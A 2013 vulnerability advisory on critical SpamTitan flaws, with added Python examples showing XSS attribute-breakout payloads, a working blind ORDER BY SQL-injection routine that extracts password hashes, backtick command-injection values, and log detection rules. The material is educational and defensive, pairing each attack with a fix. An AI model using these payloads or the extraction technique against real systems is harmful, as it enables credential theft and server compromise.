Multiple vulnerabilities in SpamTitan

SEC Consult Vulnerability Lab Security Advisory < 20131015-0 >
=======================================================================
title: Multiple vulnerabilities in SpamTitan
product: SpamTitan
vulnerable version: <=5.12, 5.13 is likely to be affected too
fixed version: 6.00
impact: Critical
homepage: www.spamtitan.com
found: 2013-05-08
by: V. Paulikas
SEC Consult Vulnerability Lab
www.sec-consult.com
=======================================================================

 

Vendor description:
-------------------
"SpamTitan Technologies is a global provider of sophisticated enterprise-level
email security solutions, offering small and medium sized businesses the most
comprehensive protection from email threats, including spam, viruses, Trojans,
phishing, malware and other unwanted content. Our anti spam product was
launched in 2006. Today, we offer different deployment options of SpamTitan:
ISO, VMware and on Demand (cloud based appliance)."

www.spamtitan.com

 

 

Business recommendation:
------------------------
All discovered vulnerabilities can be exploited _without_ authentication and
therefore pose a highly critical security risk: the remote command execution
vulnerability can be used to compromise the server, and the SQL injection
gives access to database records such as the usernames and hashed passwords
of the management interface users.

The vulnerabilities were identified during a very short evaluation crash-test,
which the software failed completely. It is assumed that further critical
vulnerabilities exist within this product!

SEC Consult recommends switching off existing SpamTitan systems immediately
until further security measures (the vendor patch) have been implemented and
thorough follow-up security tests have been performed.

 

 

Vulnerability overview/description:
-----------------------------------
1) Cross-Site Scripting

The web GUI is prone to reflected Cross-Site Scripting. The vulnerability can
be used to inject HTML or JavaScript code into the affected web page; the code
is executed in the browser of any user who opens the manipulated link. Since
the affected page is reachable without authentication, an attacker only needs
a victim to follow the link.

2) SQL Injection

The web GUI is prone to unauthenticated SQL injection. The vulnerability can
be used to read data stored in the SpamTitan database, such as usernames and
MD5 hashed passwords of the web application users. MD5 is a fast hash, so
recovered hashes are a realistic target for offline cracking.

3) Remote command execution

Due to insufficient input validation, the web GUI passes unfiltered user input
into an operating system command. This leads to unauthenticated OS command
injection with the privileges of the web server user. By exploiting this
vulnerability, an attacker can read and write files, open network connections,
etc., which poses a critical security risk.

 

 

Proof of concept:
-----------------
1) The login form of the web GUI is vulnerable to reflected Cross-Site
Scripting. The supplied email address value is reflected into the page without
proper output encoding and is executed in the context of the victim's web
browser.

[The PoC URL has been removed from this advisory]
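The reflection described in 1), as an added example that is not part of this advisory and not SpamTitan's code: a minimal Python rendering of a login form that echoes the submitted email address into a value="" attribute. The template, the handler names and the two payloads are assumptions constructed for illustration. The point for a practitioner is that a filter which only neutralises angle brackets (here html.escape with quote=False) still allows breaking out of the attribute, so the encoding has to match the output context. The check at the end parses the result the way a browser would and reports whether the reflected value stayed inside the attribute.

```python
import html
from html.parser import HTMLParser

# Constructed form template (hypothetical; not SpamTitan's markup). The submitted
# email is echoed back into a value="" attribute, a typical place for a login
# form to reflect user input.
FORM_TEMPLATE = ('<form method="post"><input name="email" value="{email}">'
                 '<input type="submit"></form>')

# Constructed payloads. The first opens a new tag; the second contains no angle
# brackets at all and only relies on terminating the attribute early.
TAG_PAYLOAD = '"><script>alert(document.domain)</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_login_vulnerable(email: str) -> str:
    """Assumed vulnerable pattern: the raw parameter is concatenated into the HTML."""
    return FORM_TEMPLATE.format(email=email)


def render_login_quote_false(email: str) -> str:
    """Insufficient fix: only <, > and & are encoded. The attribute delimiter (")
    survives, so an attacker can still break out of value="..."."""
    return FORM_TEMPLATE.format(email=html.escape(email, quote=False))


def render_login_hardened(email: str) -> str:
    """Context-aware encoding for an HTML attribute: <, >, &, " and ' are all
    encoded, so the value can neither terminate the attribute nor open a tag."""
    return FORM_TEMPLATE.format(email=html.escape(email, quote=True))


class _TagCollector(HTMLParser):
    """Records every start tag with its (already HTML-unescaped) attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def reflection_is_contained(rendered: str, email: str) -> bool:
    """True if a browser-style parse sees exactly the template's three tags and
    the email input's value attribute decodes back to the submitted string,
    i.e. the reflected value never escaped its attribute context."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    if [name for name, _ in parser.tags] != ["form", "input", "input"]:
        return False                      # an extra tag (e.g. <script>) appeared
    attrs = parser.tags[1][1]
    return set(attrs) == {"name", "value"} and attrs["value"] == email


if __name__ == "__main__":
    for label, render in (("vulnerable", render_login_vulnerable),
                          ("quote=False", render_login_quote_false),
                          ("hardened", render_login_hardened)):
        for payload in (TAG_PAYLOAD, ATTRIBUTE_PAYLOAD):
            out = render(payload)
            print(f"{label:12s} contained={reflection_is_contained(out, payload)}  {out}")
```

Run it and the quote=False variant is the instructive row: it stops the `<script>` payload but not the attribute payload, which is why an email field that is echoed into an attribute needs `quote=True` (or the equivalent `htmlspecialchars()` with `ENT_QUOTES` in PHP).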

 

 

2) The parameter sortkey of the setup-relay-x.php script is vulnerable to SQL
injection:

[The PoC URL has been removed from this advisory]
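The class of bug named in 2), as an added example that is not part of this advisory and not SpamTitan's code or schema. A parameter called sortkey is most likely spliced into an ORDER BY clause; that, the users table, the column names and the sample rows are assumptions constructed for illustration (the admin hash is MD5("password") so the result can be checked). The block shows the vulnerable pattern next to an allow-list fix and then goes beyond the advisory text: it carries a blind, boolean-based extraction through to the end, recovering a full MD5 hash from nothing but the order in which rows come back, which is the kind of access to usernames and MD5 hashed passwords the advisory warns about.

```python
import hashlib
import sqlite3

# Constructed sample data and schema (hypothetical; not SpamTitan's tables).
ADMIN_HASH = hashlib.md5(b"password").hexdigest()
SAMPLE_USERS = [
    (1, "zed", hashlib.md5(b"zed-secret").hexdigest()),
    (2, "admin", ADMIN_HASH),
    (3, "bob", hashlib.md5(b"bob-secret").hexdigest()),
]

# Allow-list for the hardened version: the request value is only ever a key
# into this dict and never becomes part of the SQL text.
SORT_COLUMNS = {"id": "id", "name": "username"}


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password_md5 TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_users_vulnerable(conn, sortkey: str) -> list:
    """Assumed vulnerable pattern: the sort key is spliced into ORDER BY.
    Identifiers cannot be bound as parameters, so this spot often stays
    injectable even in code that parameterises every WHERE value."""
    rows = conn.execute(f"SELECT username FROM users ORDER BY {sortkey}").fetchall()
    return [username for (username,) in rows]


def list_users_hardened(conn, sortkey: str) -> list:
    """Hardened version: map the request value onto a fixed column name."""
    column = SORT_COLUMNS.get(sortkey)
    if column is None:
        raise ValueError(f"unsupported sort key: {sortkey!r}")
    rows = conn.execute(f"SELECT username FROM users ORDER BY {column}").fetchall()
    return [username for (username,) in rows]


def sortkey_allowed(sortkey: str) -> bool:
    return sortkey in SORT_COLUMNS


class OrderByOracle:
    """Blind boolean SQL injection through ORDER BY: no error text and no data
    from the injected query is ever displayed, only the row order changes.
    A CASE expression sorts by username when the condition is true and by id
    when it is false; the attacker calibrates both orders with 1=1 and 1=0."""

    def __init__(self, conn):
        self.conn = conn
        self.true_order = self.query("1=1")
        self.false_order = self.query("1=0")
        if self.true_order == self.false_order:
            raise RuntimeError("row order does not distinguish true from false")

    def query(self, condition: str) -> list:
        payload = f"(CASE WHEN ({condition}) THEN username ELSE id END)"
        return list_users_vulnerable(self.conn, payload)

    def ask(self, condition: str) -> bool:
        return self.query(condition) == self.true_order


def extract_md5(oracle: OrderByOracle, username: str) -> str:
    """Recover a 32-hex-digit hash one character at a time (at most 16 requests
    per position) using only the true/false answer of the oracle."""
    recovered = ""
    for pos in range(1, 33):
        for c in "0123456789abcdef":
            cond = (f"(SELECT substr(password_md5, {pos}, 1) FROM users "
                    f"WHERE username = '{username}') = '{c}'")
            if oracle.ask(cond):
                recovered += c
                break
        else:
            raise RuntimeError(f"no match at position {pos}")
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("hardened, sort by name:", list_users_hardened(conn, "name"))
    print("extracted admin hash:  ", extract_md5(OrderByOracle(conn), "admin"))
```

The hardened variant deliberately does not try to "escape" the sort key: there is no escaping function for identifiers that is safe across databases, so the only robust fix is to never let the request value reach the SQL text at all.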

 

 

3) Due to improper user input validation it is possible to inject arbitrary
operating system commands enclosed in backticks (`). The parameter ldapserver
of the aliases-x.php script is affected by this vulnerability. Backticks are
shell command substitution, which indicates that the parameter ends up on a
shell command line and is expanded there before the intended program runs.

[The PoC URL has been removed from this advisory]
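The backtick injection from 3), as an added example that is not part of this advisory and not SpamTitan's code. The real LDAP client call is replaced by printf, which just prints the argument it receives, so the output shows whether /bin/sh expanded the backticks before the program ever saw the value; the command shape and the attacker value are assumptions constructed for illustration. Besides the vulnerable pattern and the argv fix, the block shows the caveat that is most often got wrong: wrapping the parameter in double quotes does not help, because the shell still performs command substitution inside double quotes; single quoting (shlex.quote here, escapeshellarg() in PHP) does.

```python
import shlex
import subprocess

# Constructed attacker value: a plausible hostname with a backtick payload.
INJECTED = "ldap.example.com`echo INJECTED`"


def _run(cmd, use_shell: bool) -> str:
    """Run the command and return what the program printed."""
    return subprocess.run(cmd, shell=use_shell, capture_output=True,
                          text=True, check=True).stdout


def query_vulnerable(ldapserver: str) -> str:
    """Assumed vulnerable pattern: the parameter is concatenated into a shell
    command line. /bin/sh performs command substitution on the backticks."""
    return _run(f"printf %s {ldapserver}", use_shell=True)


def query_double_quoted(ldapserver: str) -> str:
    """Insufficient fix: the value is wrapped in double quotes. The shell still
    expands `...` and $(...) inside double quotes, so the injection survives."""
    return _run(f'printf %s "{ldapserver}"', use_shell=True)


def query_single_quoted(ldapserver: str) -> str:
    """If a shell cannot be avoided, shlex.quote single-quotes the value (PHP's
    escapeshellarg() does the same); nothing is expanded inside '...'."""
    return _run(f"printf %s {shlex.quote(ldapserver)}", use_shell=True)


def query_hardened(ldapserver: str) -> str:
    """Preferred fix: no shell at all. The argv list goes straight to execve,
    so the backticks are just bytes in the second argument."""
    return _run(["printf", "%s", ldapserver], use_shell=False)


if __name__ == "__main__":
    for fn in (query_vulnerable, query_double_quoted,
               query_single_quoted, query_hardened):
        print(f"{fn.__name__:20s} -> {fn(INJECTED)!r}")
```

The first two variants print `ldap.example.comINJECTED`, i.e. the substituted output of the inner command; the last two hand the backticks through untouched. A hostname allow-list (letters, digits, dots, hyphens, optionally a port) on top of the argv form is the defence in depth to aim for.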

 

 

Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the SpamTitan VMware
appliance version 5.12, which was the most recent version at the time of
discovery. SEC Consult did not test the interim release 5.13; it is assumed
to be vulnerable too.

 

 

Vendor contact timeline:
------------------------
2013-06-07: Contacted vendor through info@spamtitan.com, no response
2013-06-26: Contacted vendor again through helpdesk@spamtitan.com, no response
2013-07-17: Sent deadline for advisory release to vendor via
            info@spamtitan.com and helpdesk@spamtitan.com
2013-07-17: Initial vendor response
2013-07-17: Forwarded security advisory to vendor
2013-07-17: Vendor acknowledges receipt of the advisory
2013-07-17: Requested the patch release date
2013-07-17: Vendor responds with end of September as patch release date
2013-09-09: Requested patch status update
2013-09-11: Vendor reconfirms end of September as patch release date
2013-09-30: Requested patch status update
2013-09-30: Vendor responds with a delayed patch release date
2013-10-14: Requested patch status update
2013-10-14: Vendor confirms that security patches and the new version of the
            product (v6) are available
2013-10-15: SEC Consult releases security advisory

 

 

Solution:
---------
According to the vendor, the new version 6.00 fixes the identified problems.
The new version can be downloaded from the vendor's website.

 

 

Workaround:
-----------
None
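No workaround exists, but exploitation attempts against the two GET entry points named in this advisory leave traces in the web server access log (the login form reflection would typically travel in a POST body, which is not logged by default). The following added example, not part of the advisory or of the vendor's product, scans Apache combined-format lines for the sortkey and ldapserver parameters of the two scripts. The log lines are constructed here for illustration and are not the removed PoC URLs; the per-parameter rules are assumptions (a sort key should be a bare column name, an LDAP server a hostname, optionally with port or scheme).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format (not real SpamTitan
# logs). Script and parameter names come from the advisory; the payloads are
# illustrative only.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2013:10:01:02 +0200] "GET /setup-relay-x.php?sortkey=name HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Oct/2013:10:02:17 +0200] "GET /setup-relay-x.php?sortkey=(CASE%20WHEN%20(1=1)%20THEN%20name%20ELSE%20id%20END) HTTP/1.1" 200 5120 "-" "curl/7.30.0"
10.0.0.9 - - [15/Oct/2013:10:03:40 +0200] "GET /aliases-x.php?ldapserver=ldap.example.com%60id%60 HTTP/1.1" 200 2210 "-" "curl/7.30.0"
10.0.0.9 - - [15/Oct/2013:10:03:41 +0200] "GET /aliases-x.php?ldapserver=ldap.example.com%24(id) HTTP/1.1" 200 2210 "-" "curl/7.30.0"
10.0.0.7 - - [15/Oct/2013:10:05:00 +0200] "GET /aliases-x.php?ldapserver=ldap.example.com HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "request", status, ...
LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Per-parameter rules: anything a legitimate value never contains. A sort key
# should be a bare column name; an LDAP server a hostname (':' and '/' are
# left alone so host:port and ldap://host still pass).
RULES = {
    ("/setup-relay-x.php", "sortkey"): re.compile(r"[^A-Za-z0-9_]"),
    ("/aliases-x.php", "ldapserver"): re.compile(r"[`$;|&<>\s'\"()]"),
}


def suspicious_requests(log_text: str) -> list:
    """Return (timestamp, source, script, parameter, decoded value) for every
    request whose parameter value breaks the rule for that script."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)   # percent-decodes
        for (script, param), forbidden in RULES.items():
            if url.path != script:
                continue
            for value in params.get(param, []):
                if forbidden.search(value):
                    hits.append((m["ts"], m["src"], script, param, value))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Matching on the decoded value rather than the raw URL matters: the backtick arrives as %60 and the dollar sign of $(...) as %24, and a rule written against the raw line would miss both unless every encoding variant were enumerated.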

 

 

Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarters:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult

EOF V. Paulikas / @2013